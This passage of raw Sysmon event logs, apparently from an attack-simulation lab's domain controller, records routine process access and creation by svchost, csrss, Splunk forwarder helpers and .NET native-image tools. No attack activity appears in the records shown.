EM32\ntdll.dll+51791 10341000x80000000000000007423Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:19.082{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007422Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:19.082{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007421Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:19.082{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007420Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:19.082{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007419Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:19.082{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007418Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:19.082{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4603-6000-4603-000000009A01}3980C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007417Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:19.082{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4603-6000-4603-000000009A01}3980C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007416Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:19.084{08A6967A-4603-6000-4603-000000009A01}3980C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000007442Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:20.223{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4604-6000-4703-000000009A01}4428C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007441Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:20.223{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007440Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:20.223{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007439Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:20.223{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007438Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:20.223{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007437Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:20.223{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007436Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:20.223{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007435Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:20.223{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007434Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:20.223{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007433Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:20.223{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007432Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:20.223{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4604-6000-4703-000000009A01}4428C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007431Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:20.223{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4604-6000-4703-000000009A01}4428C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007430Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:20.224{08A6967A-4604-6000-4703-000000009A01}4428C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000007446Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:21.801{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4605-6000-4803-000000009A01}3144C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007445Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:21.785{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4605-6000-4803-000000009A01}3144C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007444Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:21.785{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4605-6000-4803-000000009A01}3144C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007443Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:24:21.504{08A6967A-4601-6000-4403-000000009A01}3740C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\e9c-0\System.Data.dll2021-01-14 13:24:21.504 10341000x80000000000000007449Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:22.285{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4606-6000-4903-000000009A01}4828C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007448Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:22.270{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4606-6000-4903-000000009A01}4828C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007447Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 